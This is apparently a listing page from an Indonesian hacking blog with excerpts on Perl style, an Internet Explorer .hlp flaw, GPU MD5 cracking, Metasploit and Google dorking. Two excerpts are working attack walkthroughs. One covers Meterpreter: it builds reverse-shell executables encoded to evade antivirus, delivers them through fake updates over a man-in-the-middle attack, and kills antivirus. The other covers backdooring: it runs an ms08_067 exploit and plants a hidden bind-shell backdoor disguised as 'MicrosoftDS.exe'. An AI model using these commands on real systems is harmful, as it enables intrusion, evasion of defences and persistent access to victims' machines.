Currently Browsing: Tips and Trick

use strict, bitch!

Baru saja saya somehow terlempar membaca salah satu ulasan mengenai tehnik hacking yang dipublish oleh salah satu portal ‘hacker’ indonesia. Dalam tulisan tersebut terselip satu buah script perl yang intinya hanya satu: menjalankan command tools lain. Selintas saya sempat tertawa dan berpikir “what a lamme, showing-off?” karena banyaknya peserta underground – dan ini sangat umum – yang membuat tools panjang lebar tapi isinya kebanyakan non-sense. Mengenai non-sense, saya berusaha tidak men-judge berdasarkan penggunaan logika / algoritma bagaimana tools atau script tersebut di peruntukan. Setiap orang punya latar belakang berbeda, tingkat pengalaman berbeda, dan bisa dibilang kecerdasan yang berbeda dalam hal membuat code walaupun intinya satu: memecahkan masalah. Non-sense lebih kepada thanks sana sini, greet sana sini, comment sana sini, etc. Silahkan lanjutkan sendiri. Namun yang membuat ulasan tools barusan cukup terasa berbeda adalah penggunaan pragma yang ‘benar’ dalam hal bahasa pemrograman yang digunakan, yaitu perl. Saya teringat beberapa tahun silam, saat dimana untuk pertama kalinya saya tertarik lebih jauh tentang perl setelah membaca ezine dari perl undergr0und. Banyak sekali ilmu berharga yang bisa didapatkan dari ezine yang sayangnya hanya sampai jilid 5. Salah satu hal penting yang selalu di-ingatkan adalah penggunaan pragma ‘strict’ dalam setiap script / code perl. Mengapa? ulasan singkatnya bisa dibaca dari sini. Nah, tools yang saya ceritakan diawal ini walaupun intinya hanya satu baris tapi menggunakan pragma ‘strict’. Cukup terkejut mengingat banyaknya peserta underground yang tidak peduli tentang ‘good coding’. Jika ada diantara kalian yang pernah membuat the-so-called exploit/tools/script menggunakan perl dan tidak sekalipun peduli masalah pragma, penggunaan strict secara tidak langsung mengasah skill coding kalian. Boleh saja belajar perl sambil mengisi waktu menjadi penjaga warnet, namun proses mencari tahu letak kesalahan yang di komplain oleh pragma tersebut walaupun cukup menghabiskan banyak waktu akan membuat skill coding kalian setingkat dengan coder profesional. Setidaknya dalam hal penguasaan bahasa pemrograman perl. Orang-orang underground sering mengatakan coder adalah...
Read More of use strict, bitch!

Malicious .hlp, kiTrap0d, system shell

Pada tanggal 26 February 2010, Maurycy Prodeus mengeluarkan public disclosure terhadap bug internet explorer 6, 7, dan 8 yang dapat di-eksploitasi menggunakan malicious .HLP file. Berikut ini pernyataan dari maurycy, It is possible to invoke winhlp32.exe from Internet Explorer 8,7,6 using VBScript. Passing malicious .HLP file to winhlp32 could allow remote attacker to run arbitrary command. Additionally, there is a stack overflow vulnerability in winhlp32.exe Intinya, dengan memanfaatkan VBScript maka user dapat meng-ekesekusi winhlp32.exe untuk membuka suatu file bertipe .hlp (windows help file) melalui browser internet explorer 6, 7, 8. Dan jika file .hlp tersebut sudah dimodifikasi sehingga menjadi malicious .hlp maka user dapat di-eksploitasi untuk menjalankan malicious code. Pihak microsoft untuk sementara memasukan ekstensi file .hlp kedalam kategori ‘unsafe file types’. Untuk men-trigger vulnerability diatas cukup unik dan membutuhkan interaksi dari user untuk menekan tombol F1 ketika MessageBox muncul. Syntax untuk menampilkan MessageBox melalui VBScript sebagai berikut, MsgBox(prompt[,buttons][,title][,helpfile,context]) Windows help file pada syntax diatas dapat diakses menggunakan samba share, berikut ini PoC dari maurycy untuk men-trigger vulnerability tersebut dan membuat user mengkases malicious .hlp file dari samba share yang telah dipersiapkannya, PoC tersebut dapat dilihat dari sini. Jelas terlihat bahwa malicious .hlp file yang digunakan terletak pada 184.73.14.110PUBLICtest.hlp. Ketika user terpancing untuk mengeksekusi maka win32hlp.exe akan berusaha membuka test.hlp tersebut yang justru mengakibatkan eksekusi calc.exe. Maurycy memberikan PoC tambahan bahwa terdapat bug stack-overflow pada win32hlp.exe ketika mengeksekusi parameter dengan path yang sangat panjang, namun berhubung win32hlp.exe di-compile menggunakan feature /GS maka bug tersebut tidak dapat di-eksploitasi begitu saja. Saat ini 184.73.14.110PUBLICtest.hlp tidak dapat diakses lagi, namun metasploit sudah memasukan exploit win32hlp tersebut kedalam trunk terbarunya. Ketika tulisan ini dibuat, versi trunk yang dimaksud adalah SVN r8723. Jika kalian penasaran ingin melihat malicious .hlp yang sebelumnya digunakan oleh maurycy, maka dapat melihat dari direktori metasploit di ‘data/exploits/runcalc.hlp’. Jduck meng-integrasikan exploit tersebut kedalam metasploit framework menggunakan fasilitas WebDAV, sehingga kita...
Read More of Malicious .hlp, kiTrap0d, system shell

.gpu pull away ur cpu.

.so bring it on, gpu “graphics processing unit” istilah yang cukup sering di dengar dalam industri graphic card dikarenakan vga sekarang ini,menerapkan proses komputasi secara terpisah dengan cpu. nvidia dengan cuda-nya,ati dengan ati stream-nya dan dalam perkembangan gpu menerapkan sistem multi core. 240 core [at] nvidia gt 280, cpu sendiri hanya 2/4 core yang umum beredar. .walau dalam tujuan komersial, pihak rusia mulai menerapkan gpu dalam proses cracking. dari kubu open source ada beberapa project yang menarik dari pyrit sampai CUDA-Multiforcer. dimana juga menerapkan gpu dalam proses crackingnya. gpu cracking lebih menitik beratkan ke cuda dimana dukungan driver dari nvidia lebih baik. .let’s join our class. .in wind#ws with BarsWF MD5. .barsWF melakukan proses bruteforce terhadap single hash md5 dengan bantuan gpu. akhir-akhir ini bahkan sering digunakan sebagai ajang benchmark sebuah mesin. .–with gpu–. +-----------------------------------------------------------+ ? BarsWF MD5 bruteforcer v0.8 ? http://3.14.by/en/md5 ? ? by Svarychevski Michail http://3.14.by/ru/md5 ? ?-----------------------------------------------------------? ? GPU0: 243.92 MHash/sec CPU0: 42.92 MHash/sec ? ? CPU1: 36.80 MHash/sec ? ? ? ? GPU*: 243.92 MHash/sec CPU*: 79.72 MHash/sec ? ?-----------------------------------------------------------? ? Key: %?u*q Avg.Total: 314.76 MHash/sec ? ? Hash:2E86E42F251DC797E33C41674AF40053 ? ? Progress: 90.84 % ETC 0 days 0 hours 0 min 1 sec ? +-----------------------------------------------------------+ -- Key is: d0tZ-??------------------------------------------- found at 12second .–doesn’t with gpu–. +-----------------------------------------------------------+ ? BarsWF MD5 bruteforcer v0.8 ? http://3.14.by/en/md5 ? ? by Svarychevski Michail http://3.14.by/ru/md5 ? ?-----------------------------------------------------------? ? CPU0: 41.65 MHash/sec ? ? CPU1: 42.87 MHash/sec ? ? ? ? GPU*: 0.00 MHash/sec CPU*: 84.52 MHash/sec ? ?-----------------------------------------------------------? ? Key: U(tjt Avg.Total: 80.38 MHash/sec ? ? Hash:2E86E42F251DC797E33C41674AF40053 ? ? Progress: 90.57 % ETC 0 days 0 hours 0 min 5 sec ? +-----------------------------------------------------------+ -- Key is: d0tZ-??------------------------------------------- found at 54second .seperti yang dapat dilihat, penggunaan tanpa proses gpu memakan waktu 4.5 kalinya daripada proses pertama. $ lspci | grep -i vga 01:00.0 VGA compatible controller: nVidia Corporation G94 [GeForce 9600 GT]...
Read More of .gpu pull away ur cpu.

Metasploit’s LIB

Baru-baru ini saya membaca blog dari Matasano setelah cukup lama mereka ‘idle’ dari menulis blog. Blog yang ditulis oleh eric monti tersebut cukup menarik, intinya adalah membahas penggunaan Ruby sebagai tools untuk proses penetration testing. Silahkan dibaca secara lengkap mengenai tools tersebut. Well, eric monti bukan yang pertama. Semakin banyak pihak (baik individu maupun team) yang menggunakan ruby dalam bidang security saat ini, alasan utama karena ruby powerfull dan membuat nyaman programmer saat menyusun barisan-barisan code. Ronin juga termasuk salah satu pengikut aliran ruby untuk penetration tools. Pengikut aliran fanatisme yang kebetulan penggila metasploit biasanya akan berpikir bahwa project-project lain hanya berusaha mengikuti jejak metasploit, ataupun minimal terinspirasi oleh project metasploit. Dan HDM pernah menyebutkan bahwa metasploit di klaim sebagai project ruby terbesar saat ini. Saya pribadi tidak begitu peduli dengan berbagai macam aliran atau fanatisme, namun cukup yakin bahwa metasploit merupakan framework opensource terlengkap dalam hal pengembangan exploit untuk saat ini. Walaupun bagi para security consultan yang sudah mencicipi lezatnya core impact ataupun immunity canvas akan menilai bahwa metasploit framework berusaha mengikuti jejak kedua project tersebut, tetap saja pengaruh opensource pada suatu project akan memberikan peningkatan kreativitas yang signifikan. Alasannya jelas karena opensource mendapatkan ide-ide kreativitas dari masyarakat seluruh dunia.  Oke, cukup bicara mengenai perbandingan. Kita sering melihat pada berbagai forum ataupun mailing list dibahas mengenai metasploit sebagai alat untuk exploitasi. Updatenya ditunggu-tunggu, apalagi versi barunya. Sebetulnya tidak salah, namun itu berarti kita hanya memanfaatkan sebagian dari kemampuan penuh metasploit framework. Kita hanya memanfaatkan ‘metasploit’-nya, belum ‘framework’-nya. Mungkinkah karena tidak ada lagi hal yang membuat seseorang menjadi tertantang untuk melakukan eksplorasi? Inikah hasil dari kemudahan konsep framework dan object-oriented programming? – Taken from somewhere – Hm, agree, but not fully. Bentuk framework memang berpotensi untuk menyesatkan para pendatang baru, namun merupakan suatu seni tersendiri bagi yang tertarik untuk memanfaatkannya secara penuh. Sistem operasi dan Aplikasi user saat ini...
Read More of Metasploit’s LIB

.cheat sheat linux.

.dummies about linux??. .here few cheat sheet tentang command shell di linux,unix. .happy,kiddo… make ur choice; EOF–
Read More of .cheat sheat linux.

.fun and profit with meterpreter.

.so lets make ur choice kiddo,dengan mengacu sebelumnya pada artikel. .meterpreter non encode. neo@b0x:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 X > meterpreter_1.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 278 Options: LHOST=192.168.0.12,LPORT=455 http://www.virustotal.com/analisis/4b0a655b264b23b2f4dab74688c8890e Result: 1/39 .meterpreter with encode XOR. neo@b0x:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 R | ./msfencode -e x86/shikata_ga_nai -b '' -t exe -o meterpreter_2.exe [*] x86/shikata_ga_nai succeeded, final size 306 http://www.virustotal.com/analisis/cbb1cf1a7ce9943c5d8d15f210da8361 Result: 0/39 (0%) msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.12 LHOST => 192.168.0.12 msf exploit(handler) > set LPORT 455 LPORT => 455 msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... .next move is critical,well sekarang attacker membuat target agar mengeksekusi meterpreter_2.exe sebeneranya ini tergantung imajinasi anda sendiri. .penulis sendiri memilih ettercap sebagai jembatan menggunakan metode MITM. bisa dengan ettercap filter yang akan membuat popup setiap target melakukan browsing. .ataupun dengan kombinasi evilgrade( www.infobyte.com.ar )+ettercap dengan DNS spoofing secara tidak langsung akan mengelabui target untuk melakukan fake patch untuk beberapa program yang ada di evilgrade exam: winamp,winzip,notepad++ bisa juga menambahkan modul tersendiri di evilgrade; firefox ataupun thunderbird (-.-)”. .setelah target mengeksekusi meterperter_2.exe. [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.0.12:455 -> 192.168.0.5:1037) meterpreter > sysinfo Computer: PENTEST3 OS : Windows XP (Build 2600, Service Pack 3). .with remote desktop. .there is for Virtual Network Computing look, im prefer CLI than GUI (^^)V. meterpreter > run getgui -----------------passing------------------------ .kill AV. meterpreter > run killav [*] Killing Antivirus services on the target... .ok bisa juga dengan mengedit killav.rb untuk menambahkan beberapa list AV tersendiri. neo@b0x:~# vi /pentest/exploits/framework3/scripts/meterpreter/killav.rb # # Meterpreter script that kills all Antivirus processes # Provided by: Jerome Athias # print_status("Killing Antivirus...
Read More of .fun and profit with meterpreter.

Metasploit: Backdooring

Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp. Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut. $ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/bind_tcp Length: 307 Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut: msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English [*] Selected Target: Windows XP SP0/SP1 Universal [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780) meterpreter > cd meterpreter > pwd C: meterpreter > upload MicrosoftDS.exe [*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe [*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exe meterpreter > execute -f MicrosoftDS.exe -H Process 2348 created. Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya. msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(handler) > set LPORT 4321 LPORT => 4321 msf exploit(handler) > set RHOST 10.10.96.143 RHOST => 10.10.96.143 msf exploit(handler) > exploit [*] Starting the payload handler... [*] Started bind handler [*]...
Read More of Metasploit: Backdooring

Again, Backtrack 4 Harddisk Installation

Seperti biasa, proses instalasi Backtrack sangat-sangat simple terutama bagi para pengguna Gentoo dimana tehnik chroot dan konfigurasi boot loader bukan lagi menjadi hal yang aneh. Instalasi backtrack 4 ke harddisk secara umum dapat dilihat pada forum remote-exploit, sebagai tambahan instalasi Backtrack 4 pada MacBook dapat dilihat pada link...
Read More of Again, Backtrack 4 Harddisk Installation

Google Scanning..?!

Google adalah sebuah raksasa mesin pencari yang sampai sekarang tetap menjadi teman bagi siapapun yang bergelut di dunia internet. Iseng saya melihat-lihat kembali keyword yang biasa saya pakai untuk menengok beberapa informasi yang cukup (gak) penting. saya cukup surprise ketika saya memakai keyword ini (google hacking tetap menjadi salah satu option dalam langkah awal untuk prosess penetrasi/hacking/cracking). info ini cukup basi bagi sebagian orang, tapi menjadi tidak basi ketika anda tahu prosess selanjutnya :). Dengan info seperti diatas, google kadang-kadang lebih canggih dari pada Nmap sekalipun. NB: para admin harusnya sadar, info berharga seperti itu harusnya dihapus jauh hari sebelum sistem digunakan sebagai mesin produksi Peace ahh,...
Read More of Google Scanning..?!

Metasploit dependency

Banyak sekali pertanyaan tentang Metasploit dan cara penggunaannya baik itu di forum maupun lewat IM, padahal tools ini udah memiliki banyak dokumentasi dan bahkan forum yang khusus membahas tentang berbagai fungsi dan cara penggunaannya. Cuma terkadang ada beberapa hal yang tidak dimengerti secara baik oleh para newbie yang ingin bermain-main dengan framework metasploit ini. Seperti yang telah diutarakan oleh Cyberh3b tentang metasploit framework di blog ini, beberapa feature tools ini tidak bisa dipakai secara langsung setelah di download. Penggunaan terbaik metasploit adalah under Linux backtrack, karena package-package yang dibutuhkan sebagian besar sudah ada, tapi tetap butuh configurasi lebih lanjut. Nah, yang menjadi problem besar adalah ketika melakukan installasi metasploit ke system nix yang lain, udah pasti para newbie akan putus asa ketika mau mencoba menjalankan feature AutoPwn ataupun WMAP. Harus diperhatikan bahwa setiap applikasi yang berjalan di sebuah system pasti ada namanya dependency terhadap package atau library tertentu. Contoh simplenya adalah bahwa metasploit framework membutuhkan engine ruby agar bisa di jalankan. AutoPwn misalnya membutuhkan Postgress atau MySQL server agar bisa dipakai. Tambahan lainnya adalah, ketika mau menjalankan AutoPwn module, pastikan anda sudah melakukan configurasi terhadap database server yang anda mau pakai (karena ini adalah pertanyaan yang paling sering saya temui). Ini adalah list package yang terinstall di box saya ( FreeBSD 7.1 ) sehingga bisa menjalankan Metasploit framework dengan baik (walaupun saya belum mencoba semua feature-nya) k-elektronik# uname -rsn FreeBSD k-elektronik 7.1-RELEASE-p2 k-elektronik# pkg_info apr-db42-1.3.3.1.3.4 Apache Portability Library autoconf-2.62       Automatically configure source code on many Un*x platforms autoconf-wrapper-20071109 Wrapper script for GNU autoconf automake-1.9.6_3    GNU Standards-compliant Makefile generator (1.9) automake-wrapper-20071109 Wrapper script for GNU automake db42-4.2.52_5       The Berkeley DB package, revision 4.2 expat-2.0.1         XML 1.0 parser written in C findutils-4.4.0_3   The GNU find utilities gettext-0.17_1      GNU gettext package gmake-3.81_3        GNU version of 'make' utility help2man-1.36.4_2   Automatically generating simple manual pages from program o libdnet-1.11_2      A simple interface to low...
Read More of Metasploit dependency
Page 1 of 3123